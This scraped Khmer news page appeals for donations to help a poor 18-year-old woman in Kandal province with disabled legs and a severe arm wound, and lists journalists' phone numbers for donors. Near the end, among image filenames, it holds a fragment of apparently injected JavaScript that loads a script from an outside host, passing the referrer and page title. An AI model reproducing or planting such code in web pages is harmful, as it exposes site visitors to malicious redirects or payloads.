ព្រឹតិ្តការណ៍ថ្មីៗ

យុវតីពិការជើងមានរបួសដៃធ្ងន់ធ្ងរអាយុ១៨ឆ្នាំរស់ជាមួយឪពុកពោះម៉ាយធ្វើកម្មករសំណង់ដង្ហើយរកសប្បុរសធម៌

2 ឆ្នាំ មុន 1 តូ សុផល

កណ្តាល៖ គ្រួសារទីទាល់ ក្រីក្រគ្មានទីពឹងប្រកបមុខរបរធ្វើសំណង់មានកូនស្រីពិការដៃជើងអាយុ១៨ឆ្នាំដើរហើមដៃដង្ហើយរកសប្បុរសធម៌ និងអង្កការសប្បុរសធម៌ដើម្បីជួយព្យាបាលជំងឺនាង ដោយជីវភាពក្រីក្រគ្មានទីពឹង មានតែអំពាវនាវរកសប្បុរសនានាមេត្តាជួយគាត់ផង។

គ្រួសារក្រីក្ររូបនេះមានឈ្មាះ អ៊ន អុន អាយុ៣៩ឆ្នាំ ពោះម៉ាយប្រកបមុខរបរកម្មករសំណង់បានប្រាក់កំរៃមួយថ្ងត្រឹមតែ២មឹុនរៀលតែប៉ុណ្ណោះសព្វថ្ងៃគាត់រស់នៅភូមិ តាមេម ឃុំព្រែកស្តី ស្រុកកោះធំ ខេត្តកណ្តាល ។ គួរបញ្ញាក់ដែរថា បច្ចុប្បន្ន គាត់មានកូន៥នាក់សុទ្ធតែកូនតូចៗហើយ ផ្ទះមានទំហំ(៤គុណ៦ ម៉ែត) ដំបូលប្រកស័ង្គសី ហើយកូនដែលពិការជើងជាកូនបងបង្អស់។ ហើយស្រ្តីដែលពិការនេះមានឈ្មោះ អ៊ុន សុខខេង អាយុ១៨ឆ្នាំ មានកូនប្រុសមួយនាក់អាយុប្រហែល១ឆ្នាំកន្លះ ហើយ ស្ត្រី រូបនេះរាល់ថ្ងៃរស់នៅជាមួយឪពុកបង្កើតជាអ្នករកស៊ីចិញ្ចិម។

ឥឡូវស្រ្តីរូបនេះជួបបញ្ហាបូសនៅកន្លាក់កែងដៃធ្ងន់ធ្ងរអត់មានលុយព្យាបាល បើតាមសំដីអ្នកដែលនៅជិតខាងផ្ទះរបស់គាត់បាននិយាយប្រាប់អ្នកសារព័ត៍មានTNNថា គ្រួសាររូបនេះប្រកបមុខរបរជាកម្មករសំណង់ ដើម្បីដោះស្រាយជីវភាព ពេលខ្លះមានការងារធ្វើក៏បានធ្វើទៅ បញ្ហាពិបាកបំផុតដល់រដូវភ្លៀងធ្វើអោយគាត់គ្មានការងារធ្វើ ជួបបញ្ហាដាច់បាយក៏មានដែរ។ ឥឡូវស្រ្តីរូបនេះជួបបញ្ហា បូសនៅកន្លាក់កែងដៃធ្ងន់ធ្ងរអត់មានលុយដើម្បីវះកាត់ដូច្នេះ ទើបគាត់ ដង្ហើយរកសប្បុរសធម៌ និងអង្កការសប្បុរសធម៌ដើម្បីជួយព្យាបាលជំងឺនាង។ នាងនិយាយថាក្រោយពីវះកាត់ជើង នាងជួបបញ្ហាវះដៃទៀត។ តែឥឡូរបួសដៃនាងបានដរឡើងវិញយ៉ាងធ្ងន់ធ្ងរ កាលដែលនាងវះកាត់ដៃគឺនៅមន្ទីពេទ្យបង្អែកស្រុកកោះធំ។

បើបង ប្អូនសប្បុរសជនមានបំណងចង់ជួយជួយឧបត្ថមគ្រួសារកំសត់ខាងលើ អាចទាក់ ទងមកខ្ញុំបាទ តូ សុផល ប្រធានព័ត៌មាន TNN លោក សុខ ស៊ីឌី ភ្នាក់ទូរទស្សន៍ ហង្ស មាស និង លោក រាជ សារ៉ាត់ភ្នាក់ ទូរទស្សន៍លេខ ៣ និងPost News លោក តុង សីហា ភ្នាក់ងារ TV3 និង នគរវត្តតាម រយៈលេខ 0963899997 / 012 481 683 / 017987 600

ដោយ ម៉ែន ឌី

13275706_1247464558604704_1095707231_n 13275804_1247464681938025_386206935_n 13295102_1247464638604696_1470583103_ns.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!